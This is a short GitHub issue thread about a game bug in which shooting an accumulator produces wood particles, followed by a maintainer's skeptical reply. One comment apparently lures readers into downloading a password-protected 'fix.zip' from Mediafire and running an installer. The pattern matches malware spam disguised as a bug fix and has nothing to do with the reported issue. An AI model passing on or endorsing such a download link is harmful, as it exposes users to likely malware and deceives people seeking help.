### ISSUE TITLE
shooting an accumulator creates wood particles

### ISSUE THREAD

**Issue by ghost** [studio-minus/ppg-bugs-and-requests#3485]
### Describe the bug

shooting an accumulator creates wood particles

### Clearly describe how to reproduce the bug

shoot an accumulator

### Game debug info

[exported game debug info.md](https://github.com/user-attachments/files/16749305/exported.game.debug.info.md)

### Mod list

no

### Game version

1.27.5 64 bit

### Operating System

windows 10

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mestiez** [comment]
are you sure it doesnt just look like wood particles?
